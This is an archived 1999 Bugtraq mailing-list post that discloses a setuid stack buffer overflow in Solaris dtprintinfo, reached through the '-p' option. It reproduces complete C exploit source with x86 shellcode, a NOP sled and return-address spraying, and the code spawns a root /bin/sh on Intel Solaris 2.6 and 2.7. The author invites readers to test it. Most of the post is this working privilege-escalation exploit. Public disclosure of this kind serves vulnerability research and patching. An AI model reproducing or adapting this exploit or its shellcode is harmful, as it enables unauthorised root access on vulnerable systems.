[10507] in bugtraq

home help back first fref pref prev next nref lref last post

Solaris2.6,2.7 dtprintinfo exploits

daemon@ATHENA.MIT.EDU (UNYUN@ShadowPenguin)
Sun May 9 23:35:06 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit
Message-Id: <19990509171229.16280.qmail@www0t.netaddress.usa.net>
Date: 	Mon, 10 May 1999 02:12:29 JST
Reply-To: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
From: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
To: BUGTRAQ@NETSPACE.ORG

Hello.

"dtprintinfo" is suid program, the stack buffer can be overflowed by '-p'
option. I made an exploit program that can get root for Intel edition of
Solaris2.6 and Solaris 2.7.
Please test it.
If you test this program, please set DISPLAY environment correctly
before execution.

/*========================================================================
   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)
  ========================================================================
*/
static char             x[1000];
#define ADJUST          0
#define STARTADR        621
#define BUFSIZE         900
#define NOP             0x90
unsigned long ret_adr;
int     i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
  __asm__(" movl %esp,%eax ");
}
main()
{
        putenv("LANG=");
        for (i=0;i<BUFSIZE;i++) x[i]=NOP;
        for (i=0;i<strlen(exploit_code);i++)
                x[STARTADR+i]=exploit_code[i];
        ret_adr=get_sp() - 1292 + 148;
        for (i = ADJUST; i < 400 ; i+=4){
                x[i+0]=ret_adr & 0xff;
                x[i+1]=(ret_adr >> 8 ) &0xff;
                x[i+2]=(ret_adr >> 16 ) &0xff;
                x[i+3]=(ret_adr >> 24 ) &0xff;
        }
        x[BUFSIZE]=0;
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
        "-p",x,(char *) 0);
}


____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
home help back first fref pref prev next nref lref last post